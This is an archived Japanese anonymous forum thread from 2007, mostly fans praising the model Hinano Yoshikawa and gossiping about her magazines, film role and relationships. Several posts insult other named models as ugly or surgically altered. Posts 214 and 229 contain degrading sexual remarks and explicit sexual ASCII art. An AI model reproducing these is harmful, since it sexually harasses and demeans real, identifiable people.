生え際〜顎までが19センチ ってあったけどもっと小さくない

私も計ってみたところ同じような身長で、19だけどあんなに小さくないし…

このイベントでは、テレビの印象とは違ってちゃんと
お話しできるんだと感じました。

177 :無名モデル:2007/10/26(金) 20:42:12 ID:MMPcdN3V
あの長い髪の毛は地毛?

178 :無名モデル:2007/10/27(土) 22:16:55 ID:???
そうでしょ

179 :無名モデル:2007/10/28(日) 00:36:05 ID:NwjHEJMs
地毛かぁ
いいな
長くて綺麗で

180 :無名モデル:2007/10/28(日) 00:39:43 ID:???
うん

181 :無名モデル:2007/10/28(日) 00:55:28 ID:???
http://a-draw.com/contents/uploader2/src/up0099.jpg

182 :無名モデル:2007/10/30(火) 20:05:23 ID:T6UUZXp+
ホリエモンにやられてから、色気が出たね!
ホリエモン、マジうらやましいわ。。。

183 :無名モデル:2007/10/30(火) 20:07:34 ID:prui0utv
>>182

詳細希望

184 :無名モデル:2007/11/02(金) 13:38:32 ID:???
sweetを見て思ったのですが、
ひなのが出てるページがこれだけたくさんあるのに
表紙にも名前が出ていない・・・
何で?駅にポスター貼ってるから?
こんな可愛くてこんな出てたら表紙に
「吉川ひなのが着る冬の○○○」みたいなかんじで
大きく名前が出ててもいいと思うの。

185 :無名モデル:2007/11/02(金) 19:46:18 ID:YqZw3nxU
リアルお人形だよね。一時期下半身太ってたけどまた痩せたのかな?ひなのちゃん大好き!さらに真っ白だったら完璧だよね(^O^)

186 :無名モデル:2007/11/02(金) 19:52:32 ID:5S52WiH3
ひなのちゃん顔幅どん位なのかなぁ、、雑誌とかにのってるのみたことありますか

187 :無名モデル:2007/11/02(金) 20:23:52 ID:???
モデルの中では顔のレベルは最高クラスだよね。
エビちゃんとかもえとかひなのと比べると普通のOLにしか見えなくなる。
ひなのは歩くお人形。
エビ・もえは化粧の濃いただの人。

188 :無名モデル:2007/11/02(金) 21:16:48 ID:I2685io7
完璧ひなの(^q^)言うことなし!さすがひなのちゃんのレスにはアンチすらいない(笑)だって完璧に可愛いもん!

189 :無名モデル:2007/11/02(金) 21:21:29 ID:???
堀江とデートが汚点

190 :無名モデル:2007/11/02(金) 21:48:52 ID:???
IZAM婚は最大の汚点

191 :無名モデル:2007/11/03(土) 06:56:22 ID:???
容姿に関しては汚点のつけようがない!
パーフェクトビューティーとはひなののこと。

192 :無名モデル:2007/11/03(土) 07:28:42 ID:???
イザムのことは若気の至りって感じで風化しかけてたのに
ホリエモンの件はまだかなり痛いよねー…

193 :無名モデル:2007/11/04(日) 16:37:26 ID:???
あたまがオバカでもかわいければいいのだ☆

194 :無名モデル:2007/11/05(月) 00:32:10 ID:QYT9s/vR
というか、オバカだからかわいいんじゃないか。
オバカは長所

195 :無名モデル:2007/11/05(月) 01:48:01 ID:hEK5slS4
最近整形女が多い!二重の幅ばかり大きくしている馬鹿達!アゲハとか何で売れるのかな…ひなの様を見習え!可愛すぎる☆胸もでかいとかずるぃょ〜

196 :無名モデル:2007/11/05(月) 15:36:59 ID:xkfqeH7T
聞きたいんだが、97年くらいかな?ひなのがブレイクして、イザムと結婚する前に
ひなのって映画やらなかったけ?
で、その映画でエロイシーンというか、セクハラシーンがあったような気が
するんだが、そんな映画あったの覚えてる人いる?
あと、その映画のタイトルも教えてくれ。

197 :無名モデル:2007/11/05(月) 15:40:38 ID:???
>>196
武田真治と競演した「TOKYO EYES」かな。


198 :無名モデル:2007/11/05(月) 15:50:19 ID:xkfqeH7T
>>197
ありがとう!
その映画って、まだレンタルやってるかな?

199 :無名モデル:2007/11/05(月) 16:00:42 ID:???
>>198
大きい店じゃないとないかも・・・
あるとしても、ビデオ版かな

調べたけど日本語版DVDも廃盤になってるっぽい
デラックス版アマゾンでプレミア付きすぎ

でもひなの好きならお勧め
ストーリーやラストはやや曖昧に感じる所もあるけど
ちなみに>>196さんのいうセクハラ(?)シーンは自分もなんかエロいとか思ったw  


200 :無名モデル:2007/11/05(月) 16:31:58 ID:???
ひなのこそ日本を代表できる唯一のパーフェクトビューティーモデル。
日本で世界にも誇れる美貌を持つモデルはひなのだけ。
もえとかエビとか雑魚整形不細工モデルはひなの様を見習え。


201 :無名モデル:2007/11/05(月) 17:16:45 ID:hEK5slS4
↑間違いない

202 :無名モデル:2007/11/05(月) 19:24:38 ID:???
ほんと、ひなのを見ちゃうと他の厚化粧不細工モデルが雑魚に見えるよね。
ひなのは厚化粧なんかしなくても美形の歩くお人形だもん。
ひなの最強!


203 :無名モデル:2007/11/05(月) 20:58:46 ID:???
日本代表するモデルとして、押切もえは絶対無いわ


204 :無名モデル:2007/11/05(月) 22:24:59 ID:???
もえがひなのと同じモデルだなんて有り得ない。
もえは不細工すぎる。

205 :無名モデル:2007/11/06(火) 00:34:43 ID:???

やっぱりひなのはかわいいね

206 :無名モデル:2007/11/06(火) 04:59:17 ID:???
本人書き込んでそうでわろた

207 :無名モデル:2007/11/06(火) 15:24:32 ID:???
今日新しいピーチジョンのカタログが届いた
ひなのがモデルではないので注文しなかったカタログだった
でも小さくひなのが写っている記事が1つありちょっと嬉しかった
あんな小さくても得した気分になった
やっぱりひなのはいい仕事すると思った

208 :無名モデル:2007/11/07(水) 10:38:21 ID:7YrJyRTM
ひなのあげ

209 :無名モデル:2007/11/08(木) 18:41:34 ID:???
今月号のPINKYに載ってるファーギーとの対談読んだ人いる?
PJのサイトで二人のツーショットが小さく載ってたけど、
ファーギーと並んでも負けてない!ひなの可愛すぎる

210 :無名モデル:2007/11/09(金) 13:07:19 ID:???
負けてない、どころじゃない。
勝ってます。圧勝です。

211 :無名モデル:2007/11/09(金) 23:08:54 ID:???
>>199
どのシーンのこと?

212 :無名モデル:2007/11/10(土) 18:46:35 ID:???

ひなののHP担当者

きちんと仕事しましょうよ

さすがに8月、9月の情報はもう消しませんか

季節変わってますよ

働かないなら辞めちゃいなよ

213 :無名モデル:2007/11/11(日) 17:38:48 ID:???
ねえみんな、ペット相談見る?
そういえばひなのプロデュースのペットのHPってやつ、どうなってるの?
全然見なくなったけど、途中で頓挫しちゃったのかな?

214 :無名モデル:2007/11/12(月) 11:16:23 ID:wSK6kHO3
芸能人としてはイザムと結婚した時点で氏んでいるね
別次元では巨乳巨尻に生まれて高田 愛で 15才でおれの愛人になり俺専用
永久メス豚変態糞穴肉便器姫になり幸せでいることでしょう不老不死で

215 :無名モデル:2007/11/12(月) 22:25:27 ID:xHebeiSN
金大好きのさげまん。ホリエモンとやってるなんてきも過ぎ。

216 :無名モデル:2007/11/14(水) 10:08:03 ID:???
ペット相談みたよ。
パヒカくんかわいい!

217 :無名モデル:2007/11/15(木) 17:04:46 ID:???
ひなのは不健康そうに見えたのは気のせいでしょうか

218 :無名モデル:2007/11/16(金) 13:18:00 ID:???
アップになると疲れ気味の顔だったような…
それとも年齢的なものなのかな?

話し方が会話の内容は別として10代のような幼い話し方だった。
わざとキャラで子供っぽい話し方してるの?

219 :無名モデル:2007/11/17(土) 23:15:53 ID:???
でももうすぐ28には見えない。
えびやもえと同級生とは。

220 :無名モデル:2007/11/18(日) 15:04:57 ID:???
数年前に久しぶりにテレビでみたとき
さすがのひなのちゃんも顔のシワが目立つようになってて
かわいかったのになーと思ってたら少し前に見たときには、顔が若返ってて
かわいい感じになってた。

ほとんどの芸能人は、やってると思うけれどひなのちゃんも注入とかしてる?

顔立ちは幼いからそのへんのメンテナンスさえやっていれば
いつまでも可愛さをキープできそう!

221 :無名モデル:2007/11/18(日) 20:04:28 ID:???
今年28歳は美形の当たり年だったんだねぇ(´ω`)うらやますぃ

222 :無名モデル:2007/11/19(月) 02:08:40 ID:???
ラルクtetsuと酒井彩名が結婚

酒井彩名初期はひなのにちょっと似てた

223 :無名モデル:2007/11/19(月) 11:11:17 ID:R4NiP2D1
テツはプロポーズして断られたんだね ひなのに
イザムはごみのように捨てられたし 

224 :無名モデル:2007/11/20(火) 10:45:47 ID:???
はやくPINKY読みたいな

225 :無名モデル:2007/11/22(木) 12:17:04 ID:???
ひなのちゃんかわいい
写真集出ないかな
CM出ないかな
ひなの特集の雑誌でもいいや
買い占めちゃうよ

226 :無名モデル:2007/12/03(月) 17:55:03 ID:AL7Tw8Ba
こんだけ可愛いんだけど色黒なのが残念…。顔立ち濃いと黒く見えない?海老ちゃんもおしぎりも濃い顔立ちだから黒く見えちゃうよね。
鈴木えみとか薄い顔立ちだと白く見える

227 :無名モデル:2007/12/03(月) 18:36:07 ID:RKMZCQDI
薄い顔の小雪は色黒に見えるんかい!

228 :無名モデル:2007/12/03(月) 19:42:14 ID:pBd4IxHK
↑バーカ

229 :無名モデル:2007/12/04(火) 01:13:48 ID:X/QEdmN9
あぁ、みう、いくぅ〜 みうっ、きっ気持ちぃ〜 あぁぁぁぁぁぁ〜

      /⌒ ヽ  /        /
亀頭→ (     )'゛ヽ.     _/
.    /iー-‐'"i    ,;   /
  i ! ( ヽ.    )  ノ/ .:/  シコ!
    (\.゛ヽ_(_/,イ/       シコ!
  i ! (\\_,_)' ノ            シコ!
    (\\_,_,)'      
  i !  l ,i\ ヽ、 !   うっ、出る!みうっ、たっぷり出るよ〜   
     し'         顔にかけさせてくれ〜精子で顔をドロドロいしたい。


39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)